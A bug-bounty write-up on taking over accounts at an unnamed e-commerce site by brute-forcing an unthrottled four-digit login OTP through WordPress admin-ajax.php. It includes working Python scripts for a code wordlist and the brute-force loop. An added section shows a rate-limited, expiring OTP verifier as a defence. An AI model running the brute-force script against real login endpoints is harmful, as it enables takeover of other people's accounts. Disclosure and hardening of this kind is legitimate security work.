OTP Bruteforce Account Takeover Writeup

A creative bug hunter interested in blockchain and security
This post is about how I was able to take over any account on an e-commerce site (let's call it target.com).
On this site you can register with either a phone number or an email address.
When registering with a phone number, you enter the number, the website sends an OTP code, and you have to enter that code to verify it.
After registration, your default username is your phone number (if you registered with an email address, your email address is your default username).
When you comment on a post on target.com, other users can see your phone number or email address, and the login page needs no password, because the login method is OTP verification.
After reviewing the requests and testing a wrong OTP code, I found that the verification goes through admin-ajax.php, and that this endpoint has no restriction on how many OTP codes you can try. Since a phone number is both visible in comments and the only thing needed to start a login, an unthrottled OTP check means any commenter's account can be taken over.


Since the OTP code was four digits, I wrote a simple Python script to generate every possible code (0000 to 9999):
file = open("otpcode.txt", 'w')
otp_generator = 0
while otp_generator <= 9999:  # include both 0000 and 9999
    # print(format(otp_generator, '04'))
    file.write(format(otp_generator, '04') + '\n')
    otp_generator += 1
file.close()
print('Finish')
Then I wrote a simple Python script with the requests library and performed the brute force (note: without multithreading this script takes a long time; it is better to use multithreading or Burp Intruder).
import requests

url = "https://target.com/wp-admin/admin-ajax.php"
file = open('otpcode-tmp.txt', 'r')
for otp_code in file.read().splitlines():  # splitlines() avoids a trailing empty entry
    rdata = {
        "action": "digits_verifyotp_login",
        "countrycode": "+98",
        "mobileNo": "912+345+6789",
        "otp": otp_code,
        "dig_ftoken": "-1",
        "csrf": "24011e132f",
        "dtype": "1",
        "digits": "1",
        "rememberMe": "false"
    }
    tmp = requests.post(url, data=rdata)
    tmp = tmp.json()
    if tmp.get('success') == True:
        print('OTP code is : ' + str(rdata['otp']))
        break
    # print("False: " + otp_code)
file.close()
print('Finish')
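The missing control on the verification endpoint is the whole bug: with only 10,000 possible codes, a per-code attempt limit, expiry and single use are what make a four-digit OTP safe to rely on. As an added example (not code from the original post, nor from the target's plugin), here is a minimal OTP verifier in Python that enforces those controls, plus a run of the same sequential 0000..9999 guessing against it to show the code is invalidated after a handful of wrong attempts; MAX_ATTEMPTS and OTP_TTL_SECONDS are assumed policy values and the mobile number is only a dictionary key.

```python
import secrets
import time
from dataclasses import dataclass

MAX_ATTEMPTS = 5        # assumed policy: a code is invalidated after five wrong guesses
OTP_TTL_SECONDS = 120   # assumed policy: a code is valid for two minutes
OTP_DIGITS = 4          # same code length as in the write-up

@dataclass
class OtpRecord:
    code: str
    issued_at: float
    attempts: int = 0

class OtpService:
    def __init__(self, clock=time.time, rng=secrets.randbelow):
        self._clock = clock   # injectable for tests
        self._rng = rng       # CSPRNG by default; injectable for tests
        self._pending: dict[str, OtpRecord] = {}

    def issue(self, mobile: str) -> str:
        code = f"{self._rng(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self._pending[mobile] = OtpRecord(code=code, issued_at=self._clock())
        return code  # a real system sends this by SMS instead of returning it

    def verify(self, mobile: str, submitted: str) -> str:
        rec = self._pending.get(mobile)
        if rec is None:
            return "no_pending_otp"   # nothing issued, or already used/expired/invalidated
        if self._clock() - rec.issued_at > OTP_TTL_SECONDS:
            del self._pending[mobile]
            return "expired"
        rec.attempts += 1             # every submission counts, malformed ones included
        if secrets.compare_digest(rec.code.encode(), submitted.encode()):
            del self._pending[mobile]  # single use: the code cannot be replayed
            return "ok"
        if rec.attempts >= MAX_ATTEMPTS:
            del self._pending[mobile]  # invalidate; the user must request a fresh code
            return "invalidated"
        return "wrong"

def simulate_sequential_guessing(service: OtpService, mobile: str) -> dict:
    # Submit 0000..9999 in order, as the write-up's script does, and tally the outcomes.
    outcomes = {}
    for guess in range(10 ** OTP_DIGITS):
        result = service.verify(mobile, f"{guess:0{OTP_DIGITS}d}")
        outcomes[result] = outcomes.get(result, 0) + 1
        if result == "ok":
            break
    return outcomes
```

Against this verifier the sequential run reaches the attempt limit on the fifth guess and every later submission is refused, so the guessing never succeeds; a real deployment would add a per-phone-number and per-IP rate limit on the endpoint as well.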
I hope you enjoyed reading this write-up :)